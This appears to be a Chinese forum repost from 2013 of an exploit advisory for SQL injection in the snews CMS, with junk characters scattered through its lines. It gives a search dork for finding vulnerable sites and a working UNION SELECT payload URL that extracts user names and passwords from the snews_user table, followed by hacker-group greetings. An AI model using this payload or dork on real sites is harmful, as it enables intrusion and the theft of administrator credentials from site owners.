标题: CMS snews SQL Injection Vulnerability
" L9 L- U# r, e& R9 T2 i作者: By onestree& J. E a* ?4 N* r2 N; i
下载地址 : http://snewscms.com/ {: J0 N9 Q! \
测试平台 : ubuntu 12.10 / win 7) T. s' {- H; E) o! t# z: r3 t" U+ p
关键词: inurl:"tanyakan pada rumput yang bergoyang"- G$ {! f3 l a9 p( P6 i
9 Z% f- t, x7 H" W z0 D/ W1 J5 `" J* G1 _; I5 c
*************************************************************! J0 @8 P' Q) p6 E/ o4 Z; d
+ l, N6 A5 ]- F' \; D6 ?! h4 v
SQL poc:% t7 G$ @( T, I
1 `1 B% V4 r* K& t+ L6 w
http://www.2cto.com /snews/snews.php?act=shownews&id=[SQL]0 ^ X, R" ]) m/ ^! z' P
2 T0 Z# X* E. D0 f% T0 Z
示例 S+ v7 d2 K! i: r) ~0 M2 B% h! s
( X$ S* e) h8 ?$ shttp://localhost/snews/snews.php?act=shownews&id=-23/**/union/**/select/**/0,1,concat(user_name,char(32),user_pass),3,4,5,6/**/from/**/snews_user/**/where/**/id%20like%201/*
; V N% u$ Y4 _0 ^& m$ r
* {/ S0 ]; s# F; L* Q& B0 }3 I
3 e0 j% W3 W2 V- W致谢:' ]+ c n+ y+ C8 @4 f# E2 ?* n
, E+ Q% P2 H9 [! S5 j" |$ i% |
Exploit-db | Alex_Ownz | alm.teardrop | abhelink | kalong666 | prorebell# Z8 o0 `: N7 U+ F; m+ P' q, j
. g6 t0 M) x$ a, [
indonesiancoder - moeslimh4x0r - go-coder
5 h1 K' v+ u/ N * Y% z. L& U! ?# |4 S& B* S
spesial my hunny :*8 P% f3 Z- ]3 V
|
发表于 2013-1-23 08:55:06
收藏
分享
支持
反对